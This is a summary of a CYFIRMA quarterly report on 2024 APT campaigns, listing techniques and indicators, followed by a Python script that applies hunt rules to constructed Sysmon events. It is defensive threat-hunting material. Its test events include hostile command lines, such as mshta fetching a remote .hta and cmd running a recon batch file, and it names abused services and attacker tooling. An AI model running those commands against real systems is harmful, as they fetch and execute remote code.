APT QuarterlyHighlights : Q2 2024 – CYFIRMA

The Q2 2024 report flags intensified APT activity across Iran, Russia, China, and North Korea, with campaigns targeting governments, critical infrastructure, and global sectors. It highlights new tools, backdoors, and evasion techniques (e.g., web shells, DLL side-loading, and sophisticated social engineering), underscoring the need for ongoing vigilance and software updates. Hashtags: #VoidManticore #MuddyWater #Kimsuky #LazarusGroup #Nestdoor #TRANSLATEXT

Keypoints

  • Surge in APT activity in Q2 2024 from Iran, Russia, China, and North Korea with cross-region targeting of government, finance, energy, and critical infrastructure sectors.
  • Iranian operations featured destructive wipers and data theft (Void Manticore) and Middle East-focused intrusions (MuddyWater) using spear-phishing and remote access tools.
  • Russian actors showcased espionage and credential-theft campaigns (APT28/Forest Blizzard, Sandworm) with CVE chaining and DLL manipulation; FIN7 expanded to defense and transportation sectors.
  • Chinese actors escalated cyber-espionage with RedJuliett’s edge-device exploitation and APT41’s multi-platform backdoors (KEYPLUG) and evasion (UNAPIMON) across Windows and Linux.
  • North Korean groups (Kimsuky, Moonstone Sleet, Lazarus, Andariel) deployed new backdoors (Gomir, Kaolin RAT), fake companies, social engineering, and supply-chain-style infection vectors (Trojanized installers, fake job lures).
  • Emerging adversary behaviors include DLL side-loading, credential dumping, browser credential theft, virtualization/sandbox evasion, and application-layer C2 across diverse environments.
  • Emphasis on resilience through user education, timely patching (e.g., CVE-2022-38028, CVE-2017-11882), and continuous monitoring to counter evolving APT capabilities.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – The report notes targeted social engineering and impersonation to gain access. Quote: “phishing emails from various legitimate domains controlled by the attacker.”
  • [T1190] Exploit Public-Facing Application – RedJuliett leveraged vulnerabilities in network edge devices for initial access. Quote: “exploited known vulnerabilities in network edge devices, such as firewalls, VPNs, and load balancers for initial access.”
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – Lazarus Kaolin RAT side-loads DLLs (e.g., version.dll) to run payloads. Quote: “side-loads ‘version.dll’ … and injects a payload from ‘aws.cfg’.”
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Kimsuky and associated campaigns used PowerShell scripts. Quote: “Kimsuky’s tactics included using PowerShell scripts and manipulating the Windows registry to enforce extension installation.”
  • [T1071.001] Application Layer Protocol: Web Protocols – Adversaries tunnelled C2 over ordinary HTTP(S) so that beaconing blends with normal web traffic. Quote: “Application Layer Protocol: Web Protocols.”
  • [T1082] System Information Discovery – Several campaigns collect host data to map the environment before staging follow-on payloads. Quote: “System Information Discovery.”
  • [T1112] Modify Registry – Several campaigns, Kimsuky’s forced browser-extension installation among them, modified registry keys for persistence and execution. Quote: “Modify Registry.”

Indicators of Compromise

  • [Domain] run.mocky.io, webhook.site – IOC context: legitimate public services (a mock-API host and a request-capture service) abused as redirect and payload-delivery points in spearphishing campaigns (e.g., APT28). Because both are widely used for benign purposes, alert on them in combination with the querying process rather than blocking outright.
  • [Tool] Karma Shell, reGeorg, BiBi – IOC context: Void Manticore tooling; Karma Shell and reGeorg are web shells used for persistence and payload deployment, BiBi is the destructive wiper.
  • [Process] mshta.exe – IOC context: used by Kimsuky to execute malicious scripts via mshta.exe delivery chains.
  • [Process] vmtoolsd.exe – IOC context: hijacked legitimate process to run a reconnaissance batch file (Earth Freybug chain).
  • [File] AmazonVNC.exe and version.dll – IOC context: a renamed legitimate Windows binary that side-loads a malicious version.dll placed beside it, delivering Kaolin RAT (Lazarus). A version.dll loaded from a user-writable directory rather than System32/SysWOW64 is the observable to hunt for.
  • [Malware] ReconShark, Gomir, TRANSLATEXT, Kaolin RAT, Nestdoor, Dora RAT – IOC context: components used across campaigns for data theft, persistence, and C2.
  • [CVE] CVE-2022-38028 (Windows Print Spooler privilege escalation), CVE-2017-11882 (Office Equation Editor memory corruption), CVE-2019-0604 (SharePoint remote code execution), CVE-2024-21338 (Windows kernel driver privilege escalation) – IOC context: vulnerabilities exploited by multiple groups to gain initial access or escalate privileges; all have vendor patches available.
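The MITRE techniques and IOCs above describe behaviours rather than simple hashes, so the practical question is how to turn them into detections. The following is an added example, not code from the CYFIRMA report or from any vendor: four hunt rules (version.dll side-loaded from outside the system directories, mshta.exe launched with a URL or inline script, vmtoolsd.exe spawning a shell that runs a batch file, and DNS lookups of the abused legitimate services) run over constructed Sysmon-style events. Field names follow Sysmon (EventID, Image, ParentImage, CommandLine, ImageLoaded, QueryName); every hostname, user, path and URL in EVENTS is invented, and the two ATT&CK IDs not listed on this page (T1218.005 for mshta, T1059.003 for cmd.exe) are the standard ones for those behaviours.

```python
"""Detection rules for the tradecraft summarised above, run over constructed
Sysmon-style events. Added example, not code from the CYFIRMA report: field
names follow Sysmon, but every host, user, path and URL in EVENTS is invented."""
import ntpath
import re
from dataclasses import dataclass

# Windows system directories; a version.dll loaded from anywhere else is suspect.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SIDELOAD_DLLS = {"version.dll"}                       # DLL named in the Kaolin RAT chain
ABUSED_SERVICES = {"run.mocky.io", "webhook.site"}    # legitimate services abused by APT28
SHELLS = {"cmd.exe", "powershell.exe"}


@dataclass
class Finding:
    rule: str
    technique: str   # ATT&CK ID
    host: str
    detail: str


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _in_system_dir(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIRS)


def rule_dll_sideload(ev: dict):
    """Sysmon EID 7 (image load): a DLL with a system-DLL name loaded from outside
    the system directories by a process that also lives outside them."""
    if ev.get("EventID") != 7:
        return None
    dll, proc = ev["ImageLoaded"], ev["Image"]
    if _base(dll) in SIDELOAD_DLLS and not _in_system_dir(dll) and not _in_system_dir(proc):
        return Finding("dll_sideload", "T1574.002", ev["Computer"], f"{_base(proc)} loaded {dll}")
    return None


def rule_mshta_remote(ev: dict):
    """Sysmon EID 1 (process create): mshta.exe handed a URL or inline script.
    A plain local .hta path does not fire; tune the pattern to your environment."""
    if ev.get("EventID") != 1 or _base(ev["Image"]) != "mshta.exe":
        return None
    cmd = ev.get("CommandLine", "")
    if re.search(r"https?://|javascript:|vbscript:", cmd, re.I):
        return Finding("mshta_remote", "T1218.005", ev["Computer"], cmd)
    return None


def rule_vmtoolsd_batch(ev: dict):
    """Sysmon EID 1: vmtoolsd.exe spawning a shell that runs a batch file,
    the Earth Freybug reconnaissance pattern."""
    if ev.get("EventID") != 1 or _base(ev.get("ParentImage", "")) != "vmtoolsd.exe":
        return None
    cmd = ev.get("CommandLine", "")
    if _base(ev["Image"]) in SHELLS and re.search(r"\.bat\b", cmd, re.I):
        return Finding("vmtoolsd_batch", "T1059.003", ev["Computer"], cmd)
    return None


def rule_abused_service(ev: dict):
    """Sysmon EID 22 (DNS query) for a legitimate service the report lists as abused.
    Low fidelity on its own: correlate with the querying process before acting."""
    if ev.get("EventID") != 22:
        return None
    q = ev.get("QueryName", "").lower().rstrip(".")
    if q in ABUSED_SERVICES or any(q.endswith("." + s) for s in ABUSED_SERVICES):
        return Finding("abused_service", "T1071.001", ev["Computer"], f"{_base(ev['Image'])} -> {q}")
    return None


RULES = (rule_dll_sideload, rule_mshta_remote, rule_vmtoolsd_batch, rule_abused_service)


def run_rules(events):
    """Apply every rule to every event; return findings in event order."""
    return [f for ev in events for r in RULES if (f := r(ev)) is not None]


# Constructed events: hostnames, users, paths and the URL are invented.
EVENTS = [
    {"EventID": 7, "Computer": "WS01", "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\AmazonVNC.exe",
     "ImageLoaded": "C:\\Users\\alice\\AppData\\Local\\Temp\\version.dll"},
    {"EventID": 7, "Computer": "WS01", "Image": "C:\\Program Files\\Editor\\editor.exe",
     "ImageLoaded": "C:\\Windows\\System32\\version.dll"},                 # benign load
    {"EventID": 1, "Computer": "WS02", "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
     "CommandLine": "mshta.exe http://203.0.113.10/update.hta"},
    {"EventID": 1, "Computer": "WS02", "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta.exe C:\\Tools\\dashboard.hta"},                 # local, does not fire
    {"EventID": 1, "Computer": "SRV01", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe",
     "CommandLine": "cmd.exe /c C:\\Windows\\Temp\\recon.bat"},
    {"EventID": 22, "Computer": "WS03", "Image": "C:\\Windows\\System32\\mshta.exe",
     "QueryName": "run.mocky.io"},
    {"EventID": 22, "Computer": "WS03", "Image": "C:\\Program Files\\Browser\\browser.exe",
     "QueryName": "www.example.com"},                                     # benign
]

if __name__ == "__main__":
    for f in run_rules(EVENTS):
        print(f"[{f.technique}] {f.rule} on {f.host}: {f.detail}")
```

Run as-is it reports four findings and stays silent on the three benign events. The side-load rule keys on the loaded DLL's directory rather than its hash, because the actor controls the hash but must still place version.dll next to the renamed binary; the DNS rule is deliberately the weakest and is best used as an enrichment for the other three.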

Read more: https://www.cyfirma.com/research/apt-quarterlyhighlights-q2-2024/